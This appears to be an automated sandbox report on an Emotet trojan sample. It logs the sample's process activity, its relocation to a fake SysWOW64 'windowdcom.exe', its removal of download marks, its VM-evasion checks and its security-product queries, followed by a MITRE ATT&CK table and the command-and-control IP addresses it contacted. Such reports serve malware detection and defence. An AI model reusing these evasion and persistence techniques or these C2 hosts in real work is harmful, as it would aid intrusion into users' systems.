                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: yxghUyIGb4.exe | Virustotal: Detection: 83%
                    Source: yxghUyIGb4.exe | ReversingLabs: Detection: 96%
                    Source: unknown | Process created: C:\Users\user\Desktop\yxghUyIGb4.exe 'C:\Users\user\Desktop\yxghUyIGb4.exe'
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Process created: C:\Users\user\Desktop\yxghUyIGb4.exe C:\Users\user\Desktop\yxghUyIGb4.exe
                    Source: unknown | Process created: C:\Windows\SysWOW64\windowdcom.exe C:\Windows\SysWOW64\windowdcom.exe
                    Source: C:\Windows\SysWOW64\windowdcom.exe | Process created: C:\Windows\SysWOW64\windowdcom.exe C:\Windows\SysWOW64\windowdcom.exe
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Process created: C:\Users\user\Desktop\yxghUyIGb4.exe C:\Users\user\Desktop\yxghUyIGb4.exe
                    Source: C:\Windows\SysWOW64\windowdcom.exe | Process created: C:\Windows\SysWOW64\windowdcom.exe C:\Windows\SysWOW64\windowdcom.exe
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                    Source: yxghUyIGb4.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Code function: 0_2_00821F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

                    Persistence and Installation Behavior:

                    Creates files in the system32 config directory
                    Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90
                    Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90
                    Drops executables to the windows directory (C:\Windows) and starts them
                    Source: C:\Windows\SysWOW64\windowdcom.exe | Executable created and started: C:\Windows\SysWOW64\windowdcom.exe
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | PE file moved: C:\Windows\SysWOW64\windowdcom.exe

                    Hooking and other Techniques for Hiding and Protection:

                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | File opened: C:\Windows\SysWOW64\windowdcom.exe:Zone.Identifier (read attributes | delete)

                    Malware Analysis System Evasion:

                    Found evasive API chain (may stop execution after checking mutex)
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | API coverage: 6.5 %
                    Source: C:\Windows\System32\svchost.exe TID: 5756 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5520 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5512 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 3512 | Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | File Volume queried: C:\ FullSizeInformation
                    Source: svchost.exe, 00000007.00000002.1276322459.000002544E470000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.1211147628.00000148F1740000.00000002.00000001.sdmp, svchost.exe, 0000001D.00000002.961294020.0000021C5F200000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: svchost.exe, 0000001D.00000003.830542579.0000021C5E877000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWthernet0-WFP Native MAC Layer LightWeight Filter-0000
                    Source: svchost.exe, 00000006.00000002.598463066.0000013C68662000.00000004.00000001.sdmp | Binary or memory string: (@Hyper-V RAW
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmp, svchost.exe, 00000006.00000002.598444612.0000013C6864C000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210384278.00000148F0CD6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.960845120.0000021C5E8D8000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000007.00000002.1276322459.000002544E470000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.1211147628.00000148F1740000.00000002.00000001.sdmp, svchost.exe, 0000001D.00000002.961294020.0000021C5F200000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: svchost.exe, 00000007.00000002.1276322459.000002544E470000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.1211147628.00000148F1740000.00000002.00000001.sdmp, svchost.exe, 0000001D.00000002.961294020.0000021C5F200000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: svchost.exe, 00000006.00000002.597641934.0000013C62E29000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW@Qfh<
                    Source: svchost.exe, 0000001D.00000002.960698859.0000021C5E851000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW@
                    Source: svchost.exe, 00000007.00000002.1275992364.000002544DE67000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.928580769.00000229D7229000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000007.00000002.1276322459.000002544E470000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.1211147628.00000148F1740000.00000002.00000001.sdmp, svchost.exe, 0000001D.00000002.961294020.0000021C5F200000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Windows\SysWOW64\windowdcom.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Code function: 0_2_00821F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Code function: 0_2_00821BE0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Code function: 0_2_008215B0 GetModuleFileNameW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateEventW,CreateMutexW,CloseHandle,GetLastError,SetEvent,CloseHandle,CloseHandle,memset,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\windowdcom.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Code function: 0_2_00828D50 RtlGetVersion,GetNativeSystemInfo,
                    Source: C:\Windows\SysWOW64\windowdcom.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings:

                    Changes security center settings (notifications, updates, antivirus, firewall)
                    Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                    Source: svchost.exe, 0000001D.00000003.830852068.0000021C5F1FC000.00000004.00000001.sdmp | Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
                    Source: svchost.exe, 0000000B.00000002.1275789085.00000232F8302000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                    Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                    Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                    Stealing of Sensitive Information:

                    Yara detected Emotet
                    Source: Yara match | File source: yxghUyIGb4.exe, type: SAMPLE
                    Source: Yara match | File source: 00000001.00000000.196238760.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000000.202814564.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1275643184.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.203168982.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.195274651.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.196554240.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000000.201989781.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.203523658.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 2.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | Windows Management Instrumentation1 | DLL Side-Loading1 | Process Injection1 | Masquerading22 | OS Credential Dumping | Security Software Discovery51 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | Native API11 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion3 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud |
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | System Information Discovery24 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

                    Behavior Graph

                    Screenshots

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    Source | Detection | Scanner | Label
                    yxghUyIGb4.exe | 83% | Virustotal |
                    yxghUyIGb4.exe | 97% | ReversingLabs | Win32.Trojan.Emotet
                    yxghUyIGb4.exe | 100% | Avira | TR/Crypt.XPACK.Gen
                    yxghUyIGb4.exe | 100% | Joe Sandbox ML |

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    Source | Detection | Scanner | Label
                    1.0.yxghUyIGb4.exe.820000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    2.0.windowdcom.exe.820000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    0.0.yxghUyIGb4.exe.820000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    3.0.windowdcom.exe.820000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    3.2.windowdcom.exe.820000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    0.2.yxghUyIGb4.exe.820000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    2.2.windowdcom.exe.820000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    1.2.yxghUyIGb4.exe.820000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                    Domains

                    No Antivirus matches

                    URLs

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    Name                        Malicious  Antivirus Detection                    Reputation
                    https://178.62.39.238:443/  false      Virustotal: 5%; Avira URL Cloud: safe  unknown
                    https://79.172.249.82:443/  false      Avira URL Cloud: safe                  unknown
                    http://167.114.153.153/     false      Avira URL Cloud: safe                  unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://schemas.xmlsoap.org/ws/2005/02/sc_0svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpfalse
                      high
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpfalse
                        high
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdHsvchost.exe, 0000001B.00000002.1210656738.00000148F1364000.00000004.00000001.sdmpfalse
                          high
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdPsvchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpfalse
                            high
                            http://178.62.39.238:443/windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                            • 3%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpfalse
                              high
                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                high
                                https://167.114.153.153/windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                • 4%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                http://Passport.NET/tbposesvchost.exe, 0000001B.00000002.1211409705.00000148F1A02000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpfalse
                                    high
                                    https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpfalse
                                      high
                                      http://37.187.4.178/windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://71.244.60.231:4143/Ewindowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                        high
                                        https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.bingmapsportal.comsvchost.exe, 00000009.00000002.308009587.0000020842013000.00000004.00000001.sdmpfalse
                                            high
                                            http://cps.root-x1.letsencrypt.org0windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://79.172.249.82:443//5windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000009.00000003.307787079.0000020842045000.00000004.00000001.sdmpfalse
                                              high
                                              http://71.244.60.231:4143/%windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://cps.letsencrypt.org0windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/02/sc2svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://account.live.com/msangcwamsvchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://passport.net/tbsvchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.308009587.0000020842013000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://%s.xboxlive.comsvchost.exe, 00000007.00000002.1275929879.000002544DE43000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      low
                                                      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 0000001B.00000002.1210656738.00000148F1364000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsdsvchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://dynamic.tsvchost.exe, 00000009.00000002.308083238.0000020842064000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/02/sconsvchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://79.172.249.82:443//windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://71.244.60.231:4143/windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://79.172.249.82:443/=windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustpi7svchost.exe, 0000001B.00000003.823655029.00000148F1379000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-svchost.exe, 0000001B.00000002.1210212208.00000148F0C7F000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://80.82.115.164:4143/-windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://schemas.misvchost.exe, 0000001B.00000003.817470104.00000148F1357000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://178.62.39.238:443//windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/scRLsvchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/scrsvchost.exe, 0000001B.00000003.823655029.00000148F1379000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/scc8=svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://167.114.153.153/Vwindowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://watson.telemet43/windowdcom.exe, 00000003.00000003.278462097.0000000000BB2000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://79.172.249.82:443/p%windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://80.82.115.164:4143/5windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
